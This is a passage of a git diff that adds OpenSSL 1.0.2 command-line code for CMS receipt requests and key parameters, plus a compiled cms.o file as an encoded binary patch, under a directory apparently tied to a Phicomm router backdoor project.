+        BIO_printf(bio_err, "Signer %d:\n", i + 1);
+        if (rv == 0)
+            BIO_puts(bio_err, "  No Receipt Request\n");
+        else if (rv < 0) {
+            BIO_puts(bio_err, "  Receipt Request Parse Error\n");
+            ERR_print_errors(bio_err);
+        } else {
+            char *id;
+            int idlen;
+            CMS_ReceiptRequest_get0_values(rr, &scid, &allorfirst,
+                                           &rlist, &rto);
+            BIO_puts(out, "  Signed Content ID:\n");
+            idlen = ASN1_STRING_length(scid);
+            id = (char *)ASN1_STRING_data(scid);
+            BIO_dump_indent(out, id, idlen, 4);
+            BIO_puts(out, "  Receipts From");
+            if (rlist) {
+                BIO_puts(out, " List:\n");
+                gnames_stack_print(out, rlist);
+            } else if (allorfirst == 1)
+                BIO_puts(out, ": First Tier\n");
+            else if (allorfirst == 0)
+                BIO_puts(out, ": All\n");
+            else
+                BIO_printf(out, " Unknown (%d)\n", allorfirst);
+            BIO_puts(out, "  Receipts To:\n");
+            gnames_stack_print(out, rto);
+        }
+        if (rr)
+            CMS_ReceiptRequest_free(rr);
+    }
+}
+
+static STACK_OF(GENERAL_NAMES) *make_names_stack(STACK_OF(OPENSSL_STRING) *ns)
+{
+    int i;
+    STACK_OF(GENERAL_NAMES) *ret;
+    GENERAL_NAMES *gens = NULL;
+    GENERAL_NAME *gen = NULL;
+    ret = sk_GENERAL_NAMES_new_null();
+    if (!ret)
+        goto err;
+    for (i = 0; i < sk_OPENSSL_STRING_num(ns); i++) {
+        char *str = sk_OPENSSL_STRING_value(ns, i);
+        gen = a2i_GENERAL_NAME(NULL, NULL, NULL, GEN_EMAIL, str, 0);
+        if (!gen)
+            goto err;
+        gens = GENERAL_NAMES_new();
+        if (!gens)
+            goto err;
+        if (!sk_GENERAL_NAME_push(gens, gen))
+            goto err;
+        gen = NULL;
+        if (!sk_GENERAL_NAMES_push(ret, gens))
+            goto err;
+        gens = NULL;
+    }
+
+    return ret;
+
+ err:
+    if (ret)
+        sk_GENERAL_NAMES_pop_free(ret, GENERAL_NAMES_free);
+    if (gens)
+        GENERAL_NAMES_free(gens);
+    if (gen)
+        GENERAL_NAME_free(gen);
+    return NULL;
+}
+
+static CMS_ReceiptRequest *make_receipt_request(STACK_OF(OPENSSL_STRING)
+                                                *rr_to, int rr_allorfirst, STACK_OF(OPENSSL_STRING)
+                                                *rr_from)
+{
+    STACK_OF(GENERAL_NAMES) *rct_to, *rct_from;
+    CMS_ReceiptRequest *rr;
+    rct_to = make_names_stack(rr_to);
+    if (!rct_to)
+        goto err;
+    if (rr_from) {
+        rct_from = make_names_stack(rr_from);
+        if (!rct_from)
+            goto err;
+    } else
+        rct_from = NULL;
+    rr = CMS_ReceiptRequest_create0(NULL, -1, rr_allorfirst, rct_from,
+                                    rct_to);
+    return rr;
+ err:
+    return NULL;
+}
+
+static int cms_set_pkey_param(EVP_PKEY_CTX *pctx,
+                              STACK_OF(OPENSSL_STRING) *param)
+{
+    char *keyopt;
+    int i;
+    if (sk_OPENSSL_STRING_num(param) <= 0)
+        return 1;
+    for (i = 0; i < sk_OPENSSL_STRING_num(param); i++) {
+        keyopt = sk_OPENSSL_STRING_value(param, i);
+        if (pkey_ctrl_string(pctx, keyopt) <= 0) {
+            BIO_printf(bio_err, "parameter error \"%s\"\n", keyopt);
+            ERR_print_errors(bio_err);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cms.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cms.o
new file mode 100644
index 0000000000000000000000000000000000000000..99b5f79a93db3710d71a3a114ec14b11051809c3
GIT binary patch
literal 47256
zcmeIbd3;sH{XTvmfDt5#d#u|n1_>&d6ShPxB#^+31`M0UtuZ7Qh=e5GMZguC#Bv)@
z+iI(At=ej9tDmm6RjV}>+-j@VPi@5&aN`<xEm~`v@AIDJ=E-o!w!hc!&(G1DJLj2a
zo_WuE-ZN*;cDb~+e(vyL!vebv3uXp`dln6X;$IG?t5mWoC<w*|?-w5NarKhw^e55u
zhtaM#ilXUcN&YS&M0=6y`smp7NZCt{?&(X7t?v3{cxtb3Koh#Q7S*J;SD&?|`n0<A
zzp9s3FIl=+=k)Xyc7Fq<>e5@oXY11+Dzx(H!YeibOut}}+VGLP#Mto3x^!Q-+vwJ%
zABgt!C6CuqdZ(m5{Z=&nkb;nRU^M+!efl-KJ9S`7|8?P;(cWng3v5QT=gnk(H2t<>
z&6k~evr`+s+&{85e6#<LXV#~;pIv=c_1V>5*i!xZ`puscf$GzwEp_P+mWFRGj;8+s
zzZ6^1%3YV7qv}R+C0v(&&^D(AnX_sn_rvOe2UKo-`d`uXi_vtAacX@pQb6j{532m=
zW@R!EwcCHkzytkPN4vHbpJ}YBZroD6v@ZQmbPwFC?0J8o;`a1iy7!&pz5a%Q2dqHl
z0~hy;r?ec}8%;lmPOt_3675wjtWWPWHHUrL4vnjH*ms7meT$Nh_6#IXQ|>TDmM#vT
z)rHazgni=W@~n5ZTzrUh?`s2F3_}c1$^K_;S147fVapa3eV>nZJ(z#r*sSB1E{<OI
z#zwTPCE7b;d@1l~y1Qf@0MwSgqoe|<-%7)y4|SJRNdg;^WhN<bl+q0*tu5+O4hT}^
z#y}lYQ61$7F$ukcqP=2HaCZ^@{PtY@(PZtUaJSw=HP;FY8|=FkUlR69jupddN{R)q
z4R`;hN_`KART~AvhS-taA~Ny`ouk@x6{R<1(={bkl18~=l*`k}Kj3SWPToG4eApzV
zl6R1n4M{OkHZiYEC%Q}W$p|}hNV#2#s-3)@(obj8H6`mLEoz;TK%tNDHGmDtQlpDx
z$zU=vnEXV_V3YEzbfUZDMoC~3Fsc*XC4G{>CT88KlZw!w!J3kYO%&NgsZHeTM0d$g
zC4o(pD<tvIh!Xkgx<?02Vb5uW$nCvd#aDfAESTT(a$$Eh!0HVrl}sw^nJ)QyyxMq|
z4lgap2_K#t-Y+-2S8n(dgkg><-^~rbnhQ=H6YZ_Vlq2(wn7b1`igrDakLH)5`O&m)
zaOULP7JN6CCMNgXa5^`9VQzR$Zn!Zwyf8OBCpSDT7o6H_mvni5@g6=+6{;L@Q#3Ox
zXW7w;k$Fa(=0<@PzR#O;i#Mlt&m2=#J4TW>bK$3DPW`mZgL7u?XB?o%VCKYqKBbx4
z_O!})HirXDV{ZD_r!=Pf(=u1)%p7ysqd_n{$b5B7E<^LX9vzlh>&q(2oRuppx&NN+
zf>0zgITt&Htl^pcb7yUMd|2kA(YY;q>AuYKxwAGrK0I^3C+pD-nIGiLQjQoFWYRfv
zVdOrUc3;+r%wk_wex@Q<R!$#nc)TbxIu|>Yzu~pFGjH#m(-9jUACdX9FDpNDSFS9~
zJh|Zox#61J@Cmu#)XZqt#rZ*D_kGf*m?EQH7vT_RXULQeWSJt?MSHu|VItZKMzpsq
z^J5&3_Y58@*iM3-xdb~|5Ibd=vvUa+c3+X7tDe)Ny%%G4A1Le|VQboaM@c7+wbuCT
z>{f+?K<a>Ob!Pe5ThzZsFkPg(<Oxi2nTnisfoJNvR(f3Al)J9(k_|FdqPp>WR%h0s
zX7!nwFH%&$tc)^u?gem<nRZ`&IO{ICN^C60;%84zG;8Ar($TOn-0gTmuifN`*wY~O
z*bdD)By)PsX>wwHZz_L&&+fwR>mZE<$*nL$7B$Kf_F($YoMsi+BXL>g0-RLsX?M15
zPfOcQ`*hBB;go+mN4h;zkdt$P3HB$Yml5ctL9!MnNhy8uC+A=||0}g;O!IpN>I-YY
z5^5x%u@I3l5W#s)tvxNwy0RfZ+FOOC$JKhQVBnNyUdm-mVb2vXRC!01D6?Qv*GVP&
zreadtDz0r+wxje~yf*9$AF1Dr1Ge~6D(uWwc(<&P#RC`xaz<I$y)+`VK+>L+WR{3I
z62mYK=e}kwG&7fxsci4`K{9h^t^t~wn~l5+B&w9M7Bz<G1-Xj5r$>l2W+EAkyB(k8
zI#6C{y6Y&&qBD{Ube~~?3S0gC=I<_T4;I6vXbsuXkYC@sF6+b06fts-L5MY_nFPKj
zk?uAVr$cg%lG&ZhM}<AI@;A*{g5s*Hi*;8gt5p9e<7zgaGthr*6lct(;hXh)e^ga?
z^#j%EH>y8;PPZyqs6tP1C+@0FZ>{ZldHrY1%wlY|6U-Z`pD)5$S#nIYx2>eOrZN^J
zPr3U~GDqs>-B%2=bj9fiB1R>n57lD5Eau*$&)%Zx+I*3~30^e4s;D2Hx?SaDdr~|j
zQ7F-9LSIXzQEld>;n@lYPa<TEZu~hX8;}$>@TZ*UWxk)YaCTa0$Q(7;98%8)u1r*!
z0cp-2J(}gn`C#VRoSbY$6`8wp5(b-bk%Uc-uy|OS@nTLZ2Mf>g6qYmG%y)AZHm2#*
zy#6EiY~RuLupuXqYBJa+!AT}&<eGsw@yFp}^VRCSFuM63eL}doyQBdG)s=G8*!nJp
zsU5w&714o*OfTaMLJjY~qaqw1%1{XZ2bqlQk0{w!($DMkI7$CWrx#250iB*D>AQ6L
zd`bV0PM1jfCP{azlWL{=6`d#7kup6xJpo_+7ojo<>HY)~6D4sj5}%Po6B36>Vi^+0
zO5#)`CP`v05=ThlbErek;iZoLGVFYWglzpsnH`mL5OyMlhNKK_!J}PzUdzvX`<;OS
z3?3;xP<YM#GIZAkh1c}u-=92Ob~=O9fkVfv@?-zP-Vr5T+p7@zhe0saAVaP*Iz|>>
zcCJ)ca#9N=CsM!nE}6s6DeV4>RIe$zM=-~&1E$XWJ0+2M0g5t-M#O;9AXS{hfQ($3
z)cN%ox#uM3{Wr7h;PKKN9hE6c2r`8|ABa8r5N2!*`|JS}ZnQxo7b{AY$)jNnCdzTC
z1=8FiOo!6kNMX+wWY?pTs`@eas5Mbx&u>Ird%(<p^=TZVNmusI$@~sHHTljT3}hTD
zA*%woOJq>lD)D+%bc|kdDKDo|L-k3zzgdiqpsZ*IsYcFQgq>TFgT~+@7_Nz#=Ji)*
z3-wP{{VBQ9pBT$lu77Vyo`a&i?yA8R8*x`H+}d4+nWG-l`#G*}btE_r|3C1*bqFrN
z^2qvciw_N&|LY^Up#6XT{I|m}?7Qm(4Enp}&wuK#|G=|qHtwG$=Q(927Ugu}$>`=y
z>i&VU3#YHKp@FK+#Y|KoGZ9MQZjxNj$BIw`yUonjAiIK>*~BuN&}&L$<qMJ-djKZO
zd-V1B<cY9A-^h~F%xms9r&ZWV;xtR&N*iiXG=0CB=OH3T%OI84_0oO2N0byL4+A9Y
zreV>|SXp9r)bWOsxp(>x+`VOk3)jBWE63dkj=RS}DS0HyKP=_zH;<R{mS0%2U9BV`
z;pWtCmxD@S&vv2X02}2KxTqjiL2{|As5gKSq)s-iQJ%yd6YgTTSFZXiBDmsB<@T(*
zC7~Rhc|!8-f~>0|NG_JDaQ1kL?lBxqR`t&^b(vE}b^5sHdE&<XM2gN6v&)%m1-)g_
zp53XRNfiyaWOSLTJXz8(s5rEytPKq~wx*VvOoR>^tnyS#bG1%Ij|r)v0i>fYA5{mL
zU#m6qMI}W+vR$ncaHgCrDf+kOEK`U2o0a)$J*7=TegA<~ne%Xs1hvgdovE%C{M*{#
zw7wLsR{f_nW%kk)j7uGu`P%-v|CK+mzDiB+KR!FUV8r6o3fWaIlI(+}Z*W!PELl&K
z%3`8O)=5Psf~yy)YZi}SVX3UaWdsDzGQ@oE)oS6Z+FyNUbtBFN>(qV0)V`S?7HK0?
zEz&8d1EDrmqNSof{i-S?brnlXF|8~qsW26ASZ97c=x}>GQ3_#9$f!d=eH&k9=#7%=
zbvSj6;yPOuU{yzdxyj8-?Wc0XN5UtKRR2LHZ&>PcI?vp(RF^@r!DkFo!)}kx&Ww_C
z&722#I|k9)I#@F2{uAdysPj&k9waee-ZN;Z><G@ySDg{X6eG<MN0mq6bj9M(;37Oc
zGAGNOIMmmt>O0@wSeB{;GWWb^?id(=c8zE&_&?E>5JDeA1c`h}WcuYA;?PG6`iEoe
zq3h*p@hjlK7CAw;ldL!$7Xb9F{leOJvQbeXjXhkV0@nys*l`;(n+ByurEp4%n6h0e
z-7Qs^?yhjVTUDQ`<TB!AbqzZ|NY&dYH(kcn!nOVJq2`#w$zTsZF1N&N$BXNK3R{BY
zsp4`;)~9ud;b{nIVpM!CI9Kb`ne}w_y$ChTU{Zy4ifOcn+3vsqFDbnGeteY`UX7E-
zjaom6;d`~ZhaK&`qeRXtj6~MuMX;x^`)Cp0Jgwk)1gd$AL<-0mJ?8P`Xz^Q-DuWt|
z<x(F8T>1rtWWE6V0DmTRh?IFpHA}Le(b=<f_F-n2rl0A0Oi!Mf@j3^`!riDS{j_vE
zT$3y*4hJ^;p(_15^iZj>R9~U|<~}&NvA4cq!zz_~B9Ou><U#?;LcrqD-c9=2lX(4+
zWHBbXXyvff==3v}{XVD~5%i;7bw&Lzp;}CUcobuk>J+7kr$UrxCZR^rQN7jkND8yq
zYl<-NFlK7>^o^)CNG`B2VnSk1JRv#OoBfmI*$J*7D+;{#y!>6$;CqC|jhSEJ9>oAG
z%^WIM*fEN*95|(Vp<JSW``keOtA{;uPA4<6ss#Jm?Mq6|(f;b%8nG={E%!WlkpQEw
zf@wi2zwqvt_KA1&FOo17$h5pqwLF4yr`2^mG9c|aH$bl`A7MSAXpPl!Y?KFfs!&tv
z4hh97k<I)QcPo19;ZoI;Pul56;_MN*k&z|tm#+fn2)VwuN!?VD2&k%-NH85)teca5
z08?q^yXXr9+N{)RR@1ieOVAYunTt%Qy#Xrq>5oOI%;J`Px>%8ZyFUGjQcs_S3-6cX
z!Z949mWPGi-_en|xUlCTv}pI1s^nN?-j4LBR32{UMNtE;iYzH<*zkB&xEpoZtNZ3s
z`nxhIqR6%4ktFzcsHC+-y0tS%c1o;v?s{(9zyO}`f;)3xYPng7$%Uch5mI8EOkL4k
zx1gB#U#_P`)4xlN=)XUF1jGF!REgd)7U@Q(^80Vu@c0IJk%x~C7Cn3}MnGAwYuxTd
zq&hPWft9KdH}i;DD5^E09I<Xh-KNX1uvc-^k6vyttBUXuJk!=tZ)QJdMPVh=e^Cl&
zoUWG@h21}dg2enrh|kABK2#cAjgh<$9AACe!$E+ty!U(=%iC4(*x`V_ml%+)-ZW^M
zb~SEy7+J9yvZ=lBL`!N`e*-#6`09AeO%f9{_)wjU*e>ON-DY&%?=r(gF#T$M_CdVD
z?za$D(q(14Pzf>z?8;F_xQv7{!80AWhmXi!oH|y9WZ@U@RL4}A2%k)Ev%xNxRc}B>
z<~oR?C-G=m>PX`>bMV0AqaV9NA7xS!(zqs8*dq}E;e8VaRHwI@8A{D3$|^I*l*w4B
zl0GRyD4<dqlp9b|4k1tATa)!+8&82n<Pza=G6<Hb$N2Pvger#3p<N%XRIyC4T7a9G
zCkeCfP%}=n>-RFPIMTSewn;61=BM9*#j<j<Bv>zgxED7@vhgya#5BM9Ueu!PtnVFB
zlIa2q9+;3SOh1D|u+`{a0q|I?fMJ9zvC`Y>)9+<7>ySAyg&QR~GBe|GRUG+~Qd5+-
zU>r<DQETuJUm08Xg%z1Yb-|Ltp5J0_5wBrVzzGq`Lc|t_n0AGBT~FU7hdO8Km^g4n
zc4lTH8agx!wPC_h50e#k-;PS;>A{-bNgxK*T@OSGyEoz#H`9SXwyhGGIPyIhO^+zq
zHTkbHos1|!58`fs91{0jf}xJ;dm#{HO7YhQI;vHVvlVua*5c9L!=+Z$6kITuw3<Vr
zoAoJ#n!i-#ic&eEq;T_-=(^siC4;EACu%3mfe|IW2iR^lhGA^VLCY-05HYfcag2$1
z&$Z(u^z(YC?~!95Wk_Z(iF_Ok<vgbz#-1blxZbf!eP3NNRekGc2UH0Yc=m}>DccE-
z&NDm4PK9A8iIsOroT8Au(dx>;qf%v%{H&1la59>AXk+jQ>*_xb4D?q*QCp>!(_J4A
zOOEMz5-T(_2JMrx1Q>@o42gHuT$I=s%GM3)xrqkMPpbaRT%<PG^({_o>m`nH9F%z%
zPu3!!^c`{>lC-Zcu}=+|YBL#$e{J31I$Dq1%#+CL#o-vU8(g3sflQ7=Dk9D(?7j`z
zYIUU^BGv|d6Brok*j(5n&Xwct)A$aOSdd<=lBPafAF_=HXZs*Wk~ul54y_}}Jvf*P
z&QEVkVIg_7no9adiZ^iYQ=W2Gh5Ju6*5%0p7<n?G59Wp@cUaEc{f7o@=23Vb)8CbH
zmrspFOf5l1PKL9qD!}lbzV@*Wx!~z5ZiCO)4p|N27}O~=5vZ_<Vw-5NiB&dHW)sV7
zqR1xlZ6ab5=STuaRI9CxlZ#kDR3+xhO}3tYC$FwbR^Kb}khvLu{y$6iACWc2*sy2o
zhqf#ee{TTCZ*gyCrA|uiRj>k1ez`v%dHwJ;rbtZof$YC25V~E>I`uNk3Rz}Zbo;H6
zmWQd;$PEXE<Qr55)T(TT>@}Dir6hy20lpALc@TZ?tiBx7&k2(INs)810*Z&6h{=iU
zkyB-Is+^pAN;W8SaWhgUhvd)4dH}BvnB_OxcC8|h6|y9iSy)~PNuNHM6|g$9?9^?6
zU0C5NWSv3GQw7Q6<-+1d2u1Pmh0e<Y%ZltlBAWiTBK1Egtu9hLyDkT?%oL>6m`3dS
z0~{-kOAA@HIR`;gWU-)NJGiBNQ5k*k{WO(>`*U)qEw+1LAXE7dOrwa9p)rkRQ(@27
z-$4Eg_#+Kl2ZfgClo9G-{^Uqq@nu^#0<KB#qE{V)Ac8Fz9dtIuo7TjVv3MjFk9Wi)
z<Hje(jSkiZYnKP{Aig}96l-seukTC-lUiaXk!W4n9!!$IjqzA>tW`4OF^!%di?^;=
zA57BU$WJzRw8UuN@SE2pI#MFqlx%7oOf|=2O-ayOT35yr$wsSYc5QBR$C^%5m<T4N
z+6U9M+R#`_jc8`A9ST!x5>up25W$}*lh($YI?<?DtObo}E}t~DOn-;v6*@6}YA~rO
zmQefhU0JU7%co7ZxY5v=gF9fDoo0Btt*y05X=Haq$nGe$me}&t%E1OCW9#6k_Kwze
z^b#E3-eKL+-q9#tkHs6CWAQ<6wRgxa8rI&?luX9uyCs%vYF;I&#G2MMv1V!O^49jI
zIJ#<eY<(*ljjYy{s!(Hd2dZjk!A23vc1I$KZdwyeYHe?ct&o!0L`PeT=%YdLwiU6C
zHpx`IYXSuUab8M#wlj|ANZ6=&$ihu+DB^-ETH}cv+!gT-*x-_r9l<0co<P9Hl4xE~
z*M5FeTWd=M>B#uRXz6E@g_he)<g2{Swei-*&Zb0SZATn_iCJ$X*LTLU<WuWvG&|nZ
z4wBGY(Kk}NwkwfZer~K8X6qhOhPHMFFt@d{70!)FAGNM%ZAQFDR<yQ>&!pFsx7M@-
zOWRkscdTuX=+M`7wYICqw6(=nHnm0IereCz*5oP_ikOPfIG`&!;_wX;9T=PoI#k0G
zov3?7Ypi8-fYCR(874I+HBoBTHq5EE-<?fK1dKGQwOzANOEv*(b&!bqVhO^Q$RgdD
z2}$Ti!qq0vbW<YI(cZQ`f^P0uixOhHHhgq2Kh>6O?QDxhw8OxRi`j`tdq>h17%jEw
z{2~6Mrh$;#$67App_V2lvZCw~b7`V!Wh?@(Mb3mnTRYklXDjyP&e)pB<jIpUVXlhB
zV-b@XX^O|t4`!~Bi58pPTZ4%UYRETJl+KRWJ;Q@{2AR@iL&KNa8_d+Rfz391%1JDt
zCtS-yS9T(1=FDFl!C+1`CsWE|nF%dr&|=j~$++sAnp!-^E;HsJE!#51(*&7E2N|~M
zim<r0wgwV<j<uX2j74)~`i+!ga%n<POf>B2Q@!lzQw;|*t0C>7h%Auw41QchB`V8x
z0<-Suz=}KN8*1lAjJK5e&C8o35P_7Pvmp$b?4A;}d;hJnEeCl!;cI(ZI@%{BBZ*j3
zym=J|Y9i9wZUZHP(P>79Dvub*c9Sk|g2Tj);x?JCw?`GOj$<jF;A)k=ny-wzw0>)Q
zb6cuqa0v4phY`}QYHV#^sfz1kk}jW0$lz(hv0(^Bjyk4-$j};^+Slu*wnT)~x;&Ls
zouUtFL(3#FM<?23p0y26c0}Z;3N!4?r>5XYM-s!B+nG?f;mO>rdE71&95QW!r^a1e
zv-C(EDroi892K#=+%uL)sy;PS1LhsnfH@IID!Yl}%%Mh2@~tg6w#Y0W2Nj{AG&H%j
zU531|Q_ty`s8&j*$-+USDH&Njzixi*;OILpqJ}^`Qd7G~X~KZ4tS*S-?fK$f$ti7J
zp=NC32t;JIaWarWkz<Idc+cXJ2^&gHowW<*)h(zs1u?ru+Si<LJ`7I8l9A5T^0wAy
zRcUq+E8{ZTORCvJy9awzz0Lbi+HDSZrsauLXD5zhXq_y^;_!MTO8}@t8&jZo!HzHl
zT~kYojc2omg8@vIB?B^*!3YYy*CI<?WZLf4W7+Hhmk2f`@MVXds=W;hdKKXj)t9Sc
zO)aswXw9jX!#Wlf$_&i>i6pF~a85`b)-4_J^@^@zPy#U$$w@cyg!Nuy^Qu_$YGsj5
z#bf7pV0nYE#X$yMz#)Bw9<=cZLuQjm3X7+ekvWU%#m1~uBbEt~|5mDbRTIK~h@f7a
zIk7HHl8i{_s(6zOqK;I&Sw^rd=u|I{Z<e-=Z&t_mK}V}pTL*dzlZ6h4QaIi2s0mqi
zvVNS1zDaiMaexty)P<gJPpw&wX<}szOZg_a9t$)q$kgIO*P9(e+*Pthks03{>D25{
ztIpw8#*#^Ks9nU44#u}37GrB#RqIgW^7WW5Bhm_44$7iREr`t&qU#^BIE4jrqG!5~
z%}_1~B+#WwJ2?b%n&g1h(TPcaaN<$R*x7L1kO@Z`AuACbO1cR+!Dtb^#mB1%&aQT}
ztmF<3IO$4Rx$BZxy{pEH3lk9xGsz-rY)e#ROI}WU49kjIbFwfA+F8V!v3SU87>i+b
z#uJ$X4K)^&nWL4*h8`PC1Jqfr8V^HPXS#XzSRmsC`8v=Cd(Rr2lScFOr}NCokB3An
z#?$0<U(R9FAWt<nW6D~QY8xF4$ym|U+NKtmLwiUcBC>s?{1%UlZ#hB63Sx4Ri8<pz
zK^-X4&=kkmH6D%F6OlRk)Fe_@qohosL}ad<F-GcJ6G`AFMCQtQWn_suR-O>4ZiCqo
zd)iexz6D2}Y=w!)k`9!?9~Dj_q*IIaX`bGZNV3tOk10b#JD4|T&IysyrOQ+8$yB6r
z@|4MClfoG(wHsbiUN*UG>O>9W`jlMPm#c<yk7VA0rFa83=o3sX2+D>h8PzuIf<?iw
zbw$Gt-Dj`-t8kr1UN?}BY_;-dZb8we;U^bFItq$v3-SZGHhGfZ*dCNWvkQu@7+zaY
zyg6@nL1fd2>VneCM^+b<b&VSS(}L2Pg2?QGVo+wIXix+CIw^xqU6(_~mBZ@_im#Be
zn@7wpDBU!&rl9QdQF96^y7rn^&@jBSpaNnL1tF_673KRx1ltAj2RfUFM+=HK<y99%
zE*~+cptMVLhBp<I0;skY90%%0!pGJmf9j=erxX-lF6FvL46i9Du2!~IZ+Y+!+Qw4&
zM7AQib_QQuDSWmU=3PFjTHD)~m)Ce$!NYm;3ZBSo#P{q1AS*{2WOl*RK(^<t01A&i
zoOd#43oY%~;YiH~vJ&6bQZR2!K?PdjG+tTb|0Cv(2;P;KhxXX=0@D~LCodZnLo@PJ
z6b;32D;KdesH0*87=D#N;dWoehAEn-qR{M^uOkhAjFD3D0Ib~L-!r)CUtppu^&XBu
zmaR#DslR!FSheSt7a-_zY<U50UOQWZ+8^nlL9o=|Zq6A7cWZ7m_~DLHi@_&2c&owH
zrCG{rH+Ussl1vy}UOnP%z1kTW%x4hkOAW5uF__t7@UsUYmFhM48V8rRmt;1%*umx3
zg9O)lgPGSG{K`Q{rM_qIZ#(!84St)0|HR;TJNPdRzSY6yof@&{2?zh3!C!OmhYbEN
z2mhnNN0>OY+5c<sy&Zg;!4Gio7Y+Uy2Y<!j;~c!-;Kw@ny9S@);2#?NL<j$;!RI)5
zp4uN7oZ{fRJtG6T;mlj1;l~{OK!e8}{7{2m>foO>_$CLRVDRf4TyB#~Ki=x#y8R=A
zA3J!Z;os@tvkZQ}gV!2-n}ch=j0|=<_(H>f-N8R^@DCjPY=g^zm$znv=R0_-!3!O{
z!{7%yc*@|%IQWGIKf%E-Gx%%=|B}J$9DK9E7diOX41TtQ>;4-VtZ?uf41bM--(v7?
z2fxkW*E#sl4E|FG|Fyv%bZ~WJ7V-0pgKshX9S;78!QXK3#|{38gFj{Pz3qa^bn>$X
zFLv-92A|;IuNi#0gTHC;xeorm!RsCT?*?Du-~$F<=HMe$dqxIdaPTn(U+Lic8oa~7
zbzF`N&UbKqoE{l`#lep<I^S~ei3Y#H!H+li&mDZ4!R75>-cB_5P6w|x`0EZn&)}ap
z_<Vy8mqjyeiw!=;!B02%fezki@WUNEX7KS2zS`gu9sE3lhYr5h;3qiv#Rivmw0Y|?
zc+|nu24CsmR~h^&2mgk_?{fThy}^Iw@NYKwUmaYYq>*`kxU<0exxtTf@VgAYz`^?r
z-sIp98T>K_f6U;wIrvisf7rpFGx%E$F255X_U}JRz6ZD04Su47ziaTb9Q-4LU*g~c
z2EX0GM=8H!o#WtR4gNO=KfvHc&Vp4Q2Ne6O9DJO?&vo#L2EW0<%MAXagU>Lyod5AQ
z)8Mllyw>2CIJlngMg})I_+rC<%E8Yt_(*4|-(>Jf4!+9ZOC4O#cUbp2xSsDu2ETUj
zi;d1s2k$ocKOMZ+;JAe}Wc#YYQx1Ne!GG-FHyZqD2mgV=KX7pQAtdQ{`N=HaerfPd
z2fxSQy$-&`;I}&X?+xDP;D0js2M+$U!H?R9tqFn`4L;w&Up4r(4*sUWGY<ZN!4Dog
zRR13apX}gz-X9s9=iqy*`D<iwy@MAS{3!=N*x+wE_z?y_a;Q1MQ3fC9;H3sHaqvk7
zA0sE=v`sa*{JbG=CmMXRgU>ej0tc@%c%y?i82nlX|GdH1JNOq2{woKM8T?5HZ!`Ft
z4xTXh1iV_t+XV*S+rck0_)G`iXz<e={7QpwaPY4i{A&(=y}^Ix;5QrmX$QZ};OgQW
zHQ?t4A74ZulIj6njMG{NR~Peuf5E{YGCD~If6U-taqy=Me!YV~XYgM*_)7+V(!pOh
z_$~*3*We#H_(uj0_8r>Z0fQGf_$YPU9T^<x;A0K0ey@e34lwvshkvNSPjc{a2A}KT
z6AixD!KJD^^^>ktDUxO2J55!DxgNX`_`Y<VO*J1S&h_xud+;6)zR81M<H5i0!SD3o
zeIEROJ@|_r{9O<Ju?HWE^-V56AK}4|_TZrhpY6d<_2A1r_-f$$;kxA|Y8_{;Bcp$l
z9{z<M{BjR|g$KXJgMY_^|Hy;?%!A+W!5{PB+dcT39{dvzo{#lqu6{q*gHQ0_Gd%b_
z55CNUw|a2-S-D(xUg^Pa_TYDU@P|D3|9bG}J@|Vb{9_NEk9Bsgb{*isCwlOy9(<k$
zKhuM+@ZcRDJmtYRc<?Jd_>CU?b`Sm=5B`7$|APnL=E2|d;Q2V;$kkuP9{d;&KEs30
z@!)5A@VE#6st3QtgFoQGpY!0adGI`(7v=KLSPwqIgP-KV<rh<P=`Z)-t3CK-9{k%L
z{B{rihzH-{!Qb}a|M1{NIIqjq-lIKul?Si$;LAMtxgNaRgJ0>vZ}i}Dew(XZa(<f&
zf6;@#=fU%EzM4yCe-D1F2cPM|mwE729{e&7ezga`)q~&X!5{VD&w21SJow)|xOqq&
z&n-7LFAvr<t&TOe<Nb+5Bc3H|ULD}My6ld5n?R^|FtD)`4<X?Je!SNbB%02Tsh1-X
z!Q}cmW%4JKKjrdgiu{=&e=6iprThssN0CCs3KcD!s&c2Pzth!URWejXLshn1l`Yp5
zsIuj%Y`H31uF96HvgN8Q-Yh|l<*MuyRd$LhJ4IWk%1%*br>L@1RM{!2>=adYiYkj&
zRiHCfm7S`}PE}>6s<Km6*{Q1RR8@AWDmzt`ou<l8Q)Q>AveQ)AX{zirRTgi!K!2Jl
zJ580HrpiuNWv8pM(^c8&sx01=0e`wGJ6)BXuF6hVWv8pMGgR3bs_YC^c7`fDLzSJO
z%Fa+_XQ;9>RM{D-Y=tUYp~_aMvK6Xqg(_R2N>!**6{=K)DpjdURjN{W<pvg3s#2Az
zRHdr1QkAV#Wh+(LN>w&2Q-#AaU8mxPWlAJ0Qz~JZk_pR9o)QYnlu}rxq{1?-WkXD9
zg(k>Ml$kIKwMwW}Laky#O~+cOgDuq27M5#Ubi9Q+;6fd7p$@rF$DF)+gr<i&>OviM
zp^m#y2VOWuw@8OxsADhG!58Z23w8K~I{rc(fT51SP={csV=&Y~80shtbr^;^4nrM?
zp^n5*hhnH>G1S2r>SzpgIEFeNLmiOH;mT3kO*%kB9igEP(NM=|sDm`r@fqr14RxG`
zI#5F$si6+iP)BU2gEiFA8tQNjb-ac;U_%|Tp$^$l$84yBHq=oY>aY!U+=e=ELmj!H
z4&6}4Zdjo^UdM2#gE-Vt9O^I*bsUE}kmW5j=}v@l<GlJ)XIIxZo;r8#;@TyROR8tr
z*ER;rrj=DTE?#o#qT0qeOO`d_$<W4_JR=(DXZvL*=<L9A)UB9V^?Or^)s5}3wT<m5
zyo)926sFPDjd+176$_fmTN~%qE~s6EiWXGQuMK!-v6K^TXDYGE$ypJP#Z*>DXQN7U
zL5<9=I~67I-rA5XZIhbPo0E9R7!M!f*~nmdYlpI36_R(!Rs^++7U>q~7A6A8la|Pn
zo&g>xZ<I$vV~tW&+@kW8Epp&kgU5!|Gnq|oDkGtb8I2&3#1qtUl_O>Z^60F*C%2+?
zCGz6UYdVA4(;D#7UZOG95}SfUR&y5Mw8~WP8VX%rlgU!?Moi<>vLU;+q-0H>n$5!d
zCyf}$L-#AohwS6clOg-U&(^C1P+$lkC9;5h5oJg{gCJFw1#OMGhZ>U|jjLkof>URo
z+?ZUKEbmx;u5lWk%T=zCSk!N~EnhDObMa&OiZ#h#&Z5&BmYj+n!CPX@0bWr^*f$Tw
zXHpEWm*GVXQ>>}8Q@^g)5=e4U^@5s4)jg`;_k<FIc9<mA3(~;|fNaQg2I@5kyqJi7
